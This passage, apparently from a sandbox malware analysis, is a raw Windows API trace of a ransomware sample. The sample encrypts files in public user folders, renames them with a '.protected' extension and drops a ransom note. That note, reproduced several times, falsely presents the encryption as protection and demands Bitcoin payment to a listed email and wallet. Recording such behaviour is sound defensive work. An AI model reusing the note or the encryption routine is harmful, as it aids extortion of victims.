(lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.482] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned 41 [0095.482] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.482] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0xae, lpOverlapped=0x0) returned 1 [0095.483] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.483] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0xae, lpOverlapped=0x0) returned 1 [0095.483] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.483] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.483] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.483] CloseHandle (hObject=0xb4) returned 1 [0095.484] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini.protected") returned 51 [0095.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini.protected" (normalized: "c:\\users\\public\\downloads\\desktop.ini.protected")) returned 1 [0095.484] FindNextFileW 
(in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.484] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.484] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\RESTORE_FILES.txt") returned 47 [0095.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\downloads\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.485] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.485] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.486] lstrlenA (lpString="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") returned 684 [0095.486] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.486] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.486] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.486] CloseHandle (hObject=0xa4) returned 1 [0095.486] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.486] lstrcmpiW (lpString1="Favorites", lpString2="Windows") returned -1 [0095.486] lstrcmpiW (lpString1="Favorites", lpString2="Program Files") returned -1 [0095.486] lstrcmpiW (lpString1="Favorites", lpString2="Program Files (x86)") returned -1 [0095.486] lstrcmpiW (lpString1="Favorites", lpString2="$Recycle.bin") returned 1 [0095.486] lstrcmpiW (lpString1="Favorites", lpString2="System Volume Information") returned -1 [0095.486] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites") returned 29 [0095.486] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0095.486] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0095.486] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites\\*") returned 31 [0095.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.486] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.486] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.486] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.486] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.486] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.486] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites\\.") returned 31 [0095.486] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.486] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.486] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.486] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.486] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\." (normalized: "c:\\users\\public\\favorites\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.487] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.487] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.487] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.487] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.487] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.487] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.487] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites\\..") returned 32 [0095.487] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.487] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.487] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.487] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.487] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.487] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\.." 
(normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.487] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.487] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.487] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites\\RESTORE_FILES.txt") returned 47 [0095.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\favorites\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.487] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.487] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.488] lstrlenA (lpString="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") returned 684 [0095.488] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.488] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.488] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.488] CloseHandle (hObject=0xa4) returned 1 [0095.488] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.488] lstrcmpiW (lpString1="Libraries", lpString2="Windows") returned -1 [0095.488] lstrcmpiW (lpString1="Libraries", lpString2="Program Files") returned -1 [0095.488] lstrcmpiW (lpString1="Libraries", lpString2="Program Files (x86)") returned -1 [0095.488] lstrcmpiW (lpString1="Libraries", lpString2="$Recycle.bin") returned 1 [0095.488] lstrcmpiW (lpString1="Libraries", lpString2="System Volume Information") returned -1 [0095.488] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries") returned 29 [0095.488] lstrcmpW (lpString1="Libraries", lpString2=".") returned 1 [0095.488] lstrcmpW (lpString1="Libraries", lpString2="..") returned 1 [0095.489] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\*") returned 31 [0095.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.489] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.489] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.489] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.489] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.489] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.489] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\.") returned 31 [0095.489] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.489] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.489] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.489] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.489] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\." (normalized: "c:\\users\\public\\libraries\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.490] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.490] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.490] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.490] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.490] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.490] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.490] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\..") returned 32 [0095.490] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.490] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.490] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.490] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.490] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.490] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\.." 
(normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.490] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.490] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.490] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.490] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.490] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.490] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.490] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned 41 [0095.490] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.490] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.490] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.490] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.491] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned 41 [0095.491] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.491] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned 41 [0095.491] StrStrW 
(lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.491] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned 41 [0095.491] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.491] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x58, lpOverlapped=0x0) returned 1 [0095.492] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffffa8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.492] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x58, lpOverlapped=0x0) returned 1 [0095.492] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.492] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.492] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.492] CloseHandle (hObject=0xb4) returned 1 [0095.492] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini.protected") returned 51 [0095.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini.protected" (normalized: "c:\\users\\public\\libraries\\desktop.ini.protected")) returned 1 [0095.493] FindNextFileW 
(in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.493] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="Windows") returned -1 [0095.493] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="Program Files") returned 1 [0095.493] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="Program Files (x86)") returned 1 [0095.493] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="$Recycle.bin") returned 1 [0095.493] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="System Volume Information") returned -1 [0095.493] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0095.493] StrStrIW (lpFirst="RecordedTV.library-ms", lpSrch=".protected") returned 0x0 [0095.493] lstrcmpW (lpString1="RecordedTV.library-ms", lpString2="RESTORE_FILES.txt") returned -1 [0095.493] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.493] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.493] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0095.493] StrStrW (lpFirst="RecordedTV.library-ms", lpSrch=".txt") returned 0x0 [0095.493] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0095.493] StrStrW (lpFirst="RecordedTV.library-ms", lpSrch=".rar") returned 0x0 [0095.493] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0095.494] StrStrW (lpFirst="RecordedTV.library-ms", lpSrch=".zip") returned 0x0 [0095.494] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x36c, lpOverlapped=0x0) returned 1 [0095.557] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffc94, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.557] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x36c, lpOverlapped=0x0) returned 1 [0095.557] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.557] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.563] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.564] CloseHandle (hObject=0xb4) returned 1 [0095.564] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.protected") returned 61 [0095.564] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.protected" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.protected")) returned 1 [0095.564] FindNextFileW 
(in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.565] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.565] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\RESTORE_FILES.txt") returned 47 [0095.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\libraries\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.576] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.576] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.577] lstrlenA (lpString="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") returned 684 [0095.577] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.577] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.577] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
